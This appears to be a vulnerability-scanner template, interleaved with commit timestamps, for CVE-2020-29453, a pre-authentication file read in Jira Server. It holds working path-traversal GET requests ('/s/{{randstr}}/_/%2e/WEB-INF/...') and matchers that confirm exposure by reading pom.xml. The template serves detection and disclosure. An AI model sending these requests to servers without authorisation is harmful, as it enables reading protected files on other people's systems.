2021-08-23 04:30:16 +00:00
id : CVE-2020-29453
info :
name : Pre-Auth Limited Arbitrary File Read in Jira Server
author : dwisiswant0
2021-09-30 18:27:12 +00:00
severity : medium
2021-08-23 04:30:16 +00:00
description : The CachingResourceDownloadRewriteRule class in Jira Server and Jira Data Center allowed unauthenticated remote attackers to read arbitrary files within WEB-INF and META-INF directories via an incorrect path access check.
reference : https://jira.atlassian.com/browse/JRASERVER-72014
tags : cve,cve2020,atlassian,jira,lfi
2021-09-10 11:26:40 +00:00
classification :
2021-09-30 18:26:37 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
2021-09-30 18:27:12 +00:00
cvss-score : 5.30
2021-09-10 11:26:40 +00:00
cve-id : CVE-2020-29453
cwe-id : CWE-22
2021-08-23 04:30:16 +00:00
requests :
- method : GET
path :
- "{{BaseURL}}/s/{{randstr}}/_/%2e/WEB-INF/classes/META-INF/maven/com.atlassian.jira/jira-core/pom.xml"
- "{{BaseURL}}/s/{{randstr}}/_/%2e/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml"
2021-08-23 09:24:04 +00:00
2021-08-23 04:30:16 +00:00
matchers-condition : and
matchers :
- type : status
status :
- 200
2021-08-23 09:24:04 +00:00
2021-08-23 04:30:16 +00:00
- type : word
words :
2021-08-23 09:24:04 +00:00
- '<groupId>com.atlassian.jira</groupId>'
2021-09-29 14:35:52 +00:00
part : body